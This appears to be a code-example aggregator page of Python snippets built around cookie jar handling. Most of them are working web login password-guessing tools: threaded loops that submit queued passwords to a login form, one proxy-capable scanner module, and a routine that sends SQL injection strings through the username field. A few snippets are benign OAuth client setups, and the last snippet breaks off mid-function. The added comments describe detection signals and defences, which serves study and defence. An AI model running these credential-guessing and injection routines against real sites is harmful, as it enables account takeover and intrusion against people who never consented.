Exemplo n.º 1
def webAuthCracker(q, username):
    """Worker loop: try each queued password for ``username`` against a login form.

    Each iteration fetches ``targeturl``, feeds the page to ``myHTMLParser``,
    fills the username/password entries of the parsed field dict and POSTs the
    result to ``targetpost``.  The loop ends when ``q`` is empty or the
    module-level flag ``isBingo`` is set.

    :param q: queue of candidate passwords; each entry is right-stripped.
    :param username: account name submitted with every attempt.

    Defender's view: every attempt is a cookie-less GET of the login page
    followed at once by a POST for the same account.  That pairing is a usable
    detection signal, and per-account / per-source throttling, lockout or
    back-off, and MFA are the controls that blunt this kind of loop.
    """
    # Shared stop flag; the final message below suggests several worker
    # threads poll it (presumably started by the caller -- not shown here).
    global isBingo
    while not q.empty() and not isBingo:
        password = q.get().rstrip()
        # A fresh jar and opener per attempt: no session state carries over
        # between attempts.  Nothing here calls save()/load(), so the
        # 'cookies' filename is never read or written by this block.
        cookies = cookielib.FileCookieJar('cookies')
        opener = build_opener(HTTPCookieProcessor(cookies))
        res = opener.open(targeturl)
        htmlpage = res.read().decode()

        # Candidate credentials go to stdout in clear text; captured output
        # should be handled as sensitive data.
        print('+++TRYING %s: %s' % (username, password))

        # presumably collects the form's <input> names/values (hidden fields
        # included) so the POST mirrors the real form -- confirm in myHTMLParser
        parseR = myHTMLParser()
        parseR.feed(htmlpage)

        inputtags = parseR.tagResult
        inputtags[username_field] = username
        inputtags[pass_field] = password

        loginData = urlencode(inputtags).encode('utf-8')
        loginRes = opener.open(targetpost, data=loginData)
        loginResult = loginRes.read().decode()

        # Success is decided purely by the marker string `check` appearing in
        # the response body.
        if check in loginResult:
            isBingo = True
            print('---CRACKING SUCCESS!')
            print('---Username[%s] Password[%s]' % (username, password))
            print('---Waiting Other Threads Terminated..')
Exemplo n.º 2
    def web_bruter(self):
        """Worker loop: submit each queued password for ``self.username`` to a login form.

        Runs until ``self.password_q`` is empty or ``self.found`` is set.  Each
        attempt GETs ``target_url``, parses the page with ``BruteParser``,
        fills in the credential fields and POSTs to ``target_post``.  Written
        against the Python 2 APIs ``urllib2`` and ``urllib.urlencode``.

        Defender's view: the traffic is a cookie-less GET of the login page
        directly followed by a POST for one account, repeated.  Throttling per
        account and per source, lockout or back-off, and MFA are the relevant
        controls; the repeated GET/POST pairing is a detection signal.
        """
        while not self.password_q.empty() and not self.found:
            brute = self.password_q.get().rstrip()
            # New jar and opener per attempt, so every attempt starts without
            # cookies.  Nothing here saves the jar; "cookies" is never written.
            jar = cookielib.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            response = opener.open(target_url)
            page = response.read()
            # Candidate passwords are printed in clear text; captured output
            # should be handled as sensitive data.
            print("Trying: %s : %s (%d left)" %
                  (self.username, brute, self.password_q.qsize()))
            # parse out the hidden fields
            parser = BruteParser()
            parser.feed(page)
            post_tags = parser.tag_results

            # add our username and password fields
            post_tags[username_field] = self.username
            post_tags[password_field] = brute
            login_data = urllib.urlencode(post_tags)
            login_response = opener.open(target_post, login_data)
            login_result = login_response.read()
            # Success is decided by the marker string `success_check`
            # appearing in the response body.
            if success_check in login_result:
                self.found = True
                print("[*] Bruteforce successful.")
                # NOTE(review): this reads a module-level `username`, not
                # self.username as the "Trying" line does -- confirm that
                # global exists, otherwise this line raises NameError.
                print("[*] Username: %s" % username)
                print("[*] Password: %s" % brute)
                print("[*] Waiting for other threads to exit...")
Exemplo n.º 3
    def web_bruter(self):
        """Worker loop: submit each queued password for ``self.username`` to a login form.

        Runs until ``self.password_q`` is empty or ``self.find`` is set.  Each
        attempt GETs ``self.target_url``, parses the page with ``BruteParser``,
        fills in the credential fields and POSTs to ``self.target_post``.  A
        hit is decided from the response's Content-Length header and is then
        handed to ``DB(...).burstdb()``.

        Defender's view: the traffic is a cookie-less GET of the login page
        directly followed by a POST for one account, repeated.  Throttling per
        account and per source, lockout or back-off, and MFA are the relevant
        controls; the repeated GET/POST pairing is a detection signal.
        """
        while not self.password_q.empty() and not self.find:
            brute = self.password_q.get().decode().rstrip('\n')   # strip the trailing newline (only '\n' is removed)
            # New jar and opener per attempt; nothing here saves the jar, so
            # the "cookies" filename is never written.
            jar = cookiejar.FileCookieJar("cookies")
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            response = opener.open(self.target_url)
            page = response.read()
            # Progress line, roughly "user: %s -> trying password: %s ->
            # passwords left: %s"; candidates are printed in clear text.
            print("爆破用户:%s ------> 尝试密码:%s -------> 剩余密码数:%s" %(self.username,brute,self.password_q.qsize()))

            parser = BruteParser()
            parser.feed(page.decode())   # the parser collects the page's tags
            post_tags = parser.tag_results

            post_tags[username_tag] = self.username
            post_tags[password_tag] = brute
            # print post_tags
            login_data = urlencode(post_tags)
            login_response = opener.open(self.target_post,login_data.encode())
            #print login_response.read()
            login_result = login_response.headers  # this step differs from target to target
            # NOTE(review): a response without a Content-Length header makes
            # the lookup return None and int() raise TypeError.
            s_login_result = int(login_result["Content-Length"])
            # print s_login_result
            # print login_result["Content-Length"]
            # 34 is presumably the body length of this one target's
            # failed-login response; any other length is treated as a hit, so
            # error pages of a different size would be reported as hits too.
            if s_login_result != 34:
                self.find = True
                # print login_result["Content-Length"]
                # Messages: "cracking succeeded", "user %s has password %s",
                # "waiting for the worker threads to exit".
                print("恭喜爆破成功!!!")
                print("用户名%s它的密码为:%s" %(self.username,brute))
                print("等待爆破线程退出........")
                # Passes the URL and the clear-text credentials to DB;
                # presumably persists them -- storage location and protection
                # are not visible here, confirm in DB.burstdb().
                db = DB(self.target_url,self.username,brute)
                db.burstdb()
 def __init__(self, options, submitted):
     """Keep the run configuration and install a cookie-aware default opener.

     ``options`` must expose a ``site`` attribute; it is interpolated into the
     connection-failure message prepared here.

     The cookie jar is created without a filename and nothing in this method
     saves it, so cookies are held in memory only.  ``install_opener`` swaps
     the module's default opener (assuming ``urlrequest`` is
     ``urllib.request`` -- confirm against the imports), so later default
     ``urlopen`` calls in the process share this jar.
     """
     self.options, self.submitted = options, submitted
     site = self.options.site
     self._maybe_down_message = 'Perhaps the connection was interupted or %s is down.' % site

     jar = cookiejar.FileCookieJar()
     cookie_handler = urlrequest.HTTPCookieProcessor(jar)
     urlrequest.install_opener(urlrequest.build_opener(cookie_handler))
Exemplo n.º 5
    def __init__(self, verify_ssl=True, keyjar=None, client_cert=None, timeout=5):
        """
        Set up key storage, cookie storage and the default HTTP request options.

        :param verify_ssl: TLS server certificate validation. ``True`` validates
            against the global settings, ``False`` performs no validation, a
            filename is used as a certificate bundle in openssl format and a
            directory name as a CA directory in openssl format. The value is
            passed both to the default ``KeyJar`` and to ``request_args``, so
            ``False`` switches validation off in both places.
        :param keyjar: Store for the keys used to sign/encrypt messages. Any
            falsy value (including ``None``) is replaced by a new ``KeyJar``.
        :param client_cert: Client-side certificate, either one file holding
            private key and certificate or a tuple with both file paths.
        :param timeout: Timeout handed to the ``requests`` library, a single
            integer or a tuple of integers; see the ``requests`` documentation.
        """
        if not keyjar:
            keyjar = KeyJar(verify_ssl=verify_ssl)
        self.keyjar = keyjar

        # Created without a filename; nothing in this method loads or saves it.
        self.cookiejar = cookielib.FileCookieJar()

        # Defaults for the requests library calls. Redirects are not followed
        # automatically, so callers see (and must handle) each 3xx themselves.
        self.request_args = dict(
            allow_redirects=False,
            cert=client_cert,
            verify=verify_ssl,
            timeout=timeout,
        )

        # Tracing hooks, unset until a caller assigns them.
        self.events = None
        self.req_callback = None
Exemplo n.º 6
def webAuthCracker(username):
	"""Submit ``username`` with an empty password to the login form, once.

	Fetches ``targeturl``, feeds the page to ``myHTMLParser``, fills the
	username/password entries of the parsed field dict and POSTs the result to
	``targetpost``.  The success message labels ``username`` as an SQL
	injection string, so callers presumably pass injection test strings here
	rather than account names -- confirm against the caller.

	:param username: value placed in the form's username field.

	Defender's view: a login handler that builds its query with parameter
	binding instead of string concatenation does not treat this field as SQL;
	input containing quote or comment characters in the username field is a
	useful thing to log and alert on.
	"""
	password = ''
	# Nothing here calls save()/load() on the jar, so the 'cookies' filename
	# is never read or written by this block.
	cookies = cookielib.FileCookieJar('cookies')
	opener = build_opener(HTTPCookieProcessor(cookies))
	res = opener.open(targeturl)
	htmlpage = res.read().decode()

	print('+++TRYING %s: %s' %(username, password))

	# presumably collects the form's <input> names/values so the POST mirrors
	# the real form -- confirm in myHTMLParser
	parseR = myHTMLParser()
	parseR.feed(htmlpage)

	inputtags = parseR.tagResult
	inputtags[username_field] = username
	inputtags[pass_field] = password

	loginData = urlencode(inputtags).encode('utf-8')
	loginRes = opener.open(targetpost, data=loginData)
	loginResult = loginRes.read().decode()

	# Success is decided by the marker string `check` appearing in the
	# response body.
	if check in loginResult:
		print('---CRACKING SUCCESS!')
		print('---SQL INJECTION [%s]' %username)
Exemplo n.º 7
def login(user, passwd, target, port, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename,
          socks_proxy, scan_id, scan_cmd):
    """Submit one username/password pair to an HTTP login form and log a hit.

    The function GETs ``target``, builds a form body with the fields
    ``username`` and ``password``, and POSTs it to ``target:port``.  A
    response code of 200 is treated as a successful login and written as a
    JSON line to ``log_in_file``.

    :param user: username to submit.
    :param passwd: password to submit.
    :param target: URL fetched for the form; also the host part of the POST URL.
    :param port: appended to ``target`` as ``target:port`` for the POST.
    :param timeout_sec: timeout for the POST, or ``None`` for the default.
    :param log_in_file: file that receives the JSON result line (append mode).
    :param language: passed to ``messages`` and ``__log_into_file``.
    :param retries: error count at which the function gives up.
    :param time_sleep: seconds to sleep before retrying after an error.
    :param thread_tmp_filename: file overwritten with ``'0'`` on success.
    :param socks_proxy: ``socks5://`` or other ``scheme://`` proxy string,
        optionally ``user:password@host:port``; ``None`` for a direct connection.
    :param scan_id: copied into the result record.
    :param scan_cmd: copied into the result record.
    :return: 0 when the POST answered with HTTP 200, otherwise 1.
    """
    username_field = "username"
    password_field = "password"
    # Error counter shared by both try blocks; the name shadows the builtin exit().
    exit = 0

    class BruteParser(HTMLParser):
        # Records only whether inputs named "username" / "password" exist.
        # Other inputs (hidden fields included) are ignored, and both entries
        # are overwritten with the real values further down.

        def __init__(self):
            HTMLParser.__init__(self)
            self.parsed_results = {}

        def handle_starttag(self, tag, attrs):
            if tag == "input":
                for name, value in attrs:
                    if name == "name" and value == username_field:
                        self.parsed_results[username_field] = username_field
                    if name == "name" and value == password_field:
                        self.parsed_results[password_field] = password_field

    if socks_proxy is not None:
        # Anything that is not socks5:// is handled as SOCKS4.
        socks_version = socks.SOCKS5 if socks_proxy.startswith(
            'socks5://') else socks.SOCKS4
        socks_proxy = socks_proxy.rsplit('://')[1]
        if '@' in socks_proxy:
            # NOTE(review): splitting on ':' and '@' mis-parses proxy
            # credentials that themselves contain either character.
            socks_username = socks_proxy.rsplit(':')[0]
            socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
            socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
                                    int(socks_proxy.rsplit(':')[-1]), username=socks_username,
                                    password=socks_password)
            # Replaces socket.socket and socket.getaddrinfo on the module
            # itself, so every later connection in this process is affected,
            # not just this call.  `getaddrinfo` is defined elsewhere;
            # presumably it keeps name resolution on the proxy -- confirm.
            socket.socket = socks.socksocket
            socket.getaddrinfo = getaddrinfo
        else:
            socks.set_default_proxy(socks_version, str(
                socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
            socket.socket = socks.socksocket
            socket.getaddrinfo = getaddrinfo
    while 1:
        target_host = str(target) + ":" + str(port)
        flag = 1
        try:
            # NOTE(review): assigning to `cookiejar` makes the name local to
            # login(), so the right-hand side reads an unbound local and
            # raises UnboundLocalError; the bare except below hides that and
            # counts it as a failed attempt.
            cookiejar = cookiejar.FileCookieJar("cookies")
            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(cookiejar))
            response = opener.open(target)
            page = response.read()
            parsed_html = BruteParser()
            parsed_html.feed(page)
            parsed_html.parsed_results[username_field] = user
            parsed_html.parsed_results[password_field] = passwd
            post_data = urllib.urlencode(parsed_html.parsed_results).encode()
        # NOTE(review): a bare except also catches KeyboardInterrupt and
        # SystemExit and hides programming errors as "connection failed".
        except:
            exit += 1
            # NOTE(review): `is` compares identity, not value; this only works
            # where the interpreter happens to share small int objects.  A
            # `retries` of 0 or less is never matched, so the loop would not end.
            if exit is retries:
                warn(messages(language, "http_form_auth_failed").format(
                    target, user, passwd, port))
                return 1
            else:
                time.sleep(time_sleep)
                continue
        try:
            if timeout_sec is not None:
                brute_force_response = opener.open(
                    target_host, data=post_data, timeout=timeout_sec)
            else:
                brute_force_response = opener.open(target_host, data=post_data)
            # Success oracle: the status code alone.  Login forms commonly
            # answer a rejected login with 200 as well, so a hit recorded here
            # is unverified and may be a false positive in the report.
            if brute_force_response.code == 200:
                flag = 0
                # Always true at this point (flag was just set); `is 0` is
                # again an identity comparison.
                if flag is 0:
                    info(messages(language, "http_form_auth_success").format(
                        user, passwd, target, port))
                    # The record holds the password in clear text and is
                    # appended to log_in_file; that file needs the same
                    # protection as the credentials themselves.
                    data = json.dumps(
                        {'HOST': target, 'USERNAME': user, 'PASSWORD': passwd, 'PORT': port, 'TYPE': 'http_form_brute',
                         'DESCRIPTION': messages(language, "login_successful"), 'TIME': now(), 'CATEGORY': "brute",
                         'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
                    __log_into_file(log_in_file, 'a', data, language)
                    # presumably a success marker read by the caller -- confirm
                    __log_into_file(thread_tmp_filename, 'w', '0', language)
            return flag
        except:
            exit += 1
            if exit is retries:
                warn(messages(language, "http_form_auth_failed").format(
                    target, user, passwd, port))
                return 1
            else:
                time.sleep(time_sleep)
                continue
Exemplo n.º 8
    def __init__(
        self,
        verify_ssl=None,
        keyjar=None,
        client_cert=None,
        timeout=None,
        settings: PyoidcSettings = None,
    ):
        """
        Set up settings, key storage, cookie storage and default request options.

        :param settings: :class:`PyoidcSettings` instance with the configuration
            options. A falsy value (including ``None``) is replaced by a new
            default instance.
        :param verify_ssl: Deprecated, use ``settings``. TLS server certificate
            validation: ``True`` validates against the global settings,
            ``False`` performs no validation, a filename is used as a
            certificate bundle in openssl format and a directory name as a CA
            directory in openssl format.
        :param keyjar: Store for the keys used to sign/encrypt messages. Any
            falsy value (including ``None``) is replaced by a new ``KeyJar``.
        :param client_cert: Deprecated, use ``settings``. Client-side
            certificate, either one file holding private key and certificate or
            a tuple with both file paths.
        :param timeout: Deprecated, use ``settings``. Timeout handed to the
            ``requests`` library, a single integer or a tuple of integers; see
            the ``requests`` documentation.

        Each deprecated argument that is not ``None`` raises a
        ``DeprecationWarning`` and is then written onto ``self.settings``.
        When the caller passed its own ``settings`` object, that object is
        modified in place: a settings instance shared between several clients
        would pick up e.g. ``verify_ssl=False`` for all of them.
        """
        self.settings = settings if settings else PyoidcSettings()

        # (settings attribute, legacy argument value, warning text), applied
        # in the order verify_ssl, client_cert, timeout.
        legacy_overrides = (
            (
                "verify_ssl",
                verify_ssl,
                "`verify_ssl` is deprecated, please use `settings` instead if you need to set a non-default value.",
            ),
            (
                "client_cert",
                client_cert,
                "`client_cert` is deprecated, please use `settings` instead if you need to set a non-default value.",
            ),
            (
                "timeout",
                timeout,
                "`timeout` is deprecated, please use `settings` instead if you need to set a non-default value.",
            ),
        )
        for attribute, legacy_value, message in legacy_overrides:
            if legacy_value is None:
                continue
            # stacklevel=2 attributes the warning to the code constructing
            # this object rather than to this method.
            warnings.warn(message, DeprecationWarning, stacklevel=2)
            setattr(self.settings, attribute, legacy_value)

        if not keyjar:
            keyjar = KeyJar(verify_ssl=self.settings.verify_ssl)
        self.keyjar = keyjar

        # Created without a filename; nothing in this method loads or saves it.
        self.cookiejar = cookielib.FileCookieJar()

        # Defaults for the requests library calls. Redirects are not followed
        # automatically, so callers see (and must handle) each 3xx themselves.
        self.request_args = dict(
            allow_redirects=False,
            cert=self.settings.client_cert,
            verify=self.settings.verify_ssl,
            timeout=self.settings.timeout,
        )

        # Tracing hooks, unset until a caller assigns them.
        self.events = None
        self.req_callback = None
Exemplo n.º 9
from urllib import request,parse
from http import cookiejar


# Create the cookie jar instances.
# Only `cookie` (a plain in-memory CookieJar) is handed to the opener below;
# `file`, `mozilla` and `lwp` are created without a filename and are not used
# in the lines shown here.
cookie = cookiejar.CookieJar()
file = cookiejar.FileCookieJar()
mozilla = cookiejar.MozillaCookieJar()
lwp = cookiejar.LWPCookieJar()
# Create the cookie handler
cookie_Headle = request.HTTPCookieProcessor(cookie)
# Create the HTTP request handler
http_Headle = request.HTTPHandler()
# Create the HTTPS handler (no arguments, so no custom TLS context is supplied)
https_Headle = request.HTTPSHandler()
# Build the opener from the three handlers; cookies set by responses made
# through `oper` are kept in `cookie` and sent back on later requests.
oper = request.build_opener(http_Headle,https_Headle,cookie_Headle)

'''
进行登录操作
登录完成后,将请求返回的handle信息将由请求管理器保存,可以重复使用
在请求管理器生命周期结束后,所有的hanlder信息自动销毁
'''
def test01(url):
    data = {
        # 用户名,密码,验证码
        "email":"*****@*****.**",
        "password":"******"
        # "icode":""
    }
    try: